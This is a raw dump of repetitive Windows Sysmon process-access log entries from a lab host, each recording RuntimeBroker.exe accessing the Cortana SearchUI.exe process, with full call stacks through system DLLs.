12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 